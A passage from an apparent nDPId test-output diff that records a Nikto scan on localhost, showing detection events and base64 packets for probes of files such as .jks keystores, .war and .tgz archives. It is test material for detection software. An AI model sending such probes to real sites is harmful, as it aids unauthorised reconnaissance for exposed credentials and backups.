-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 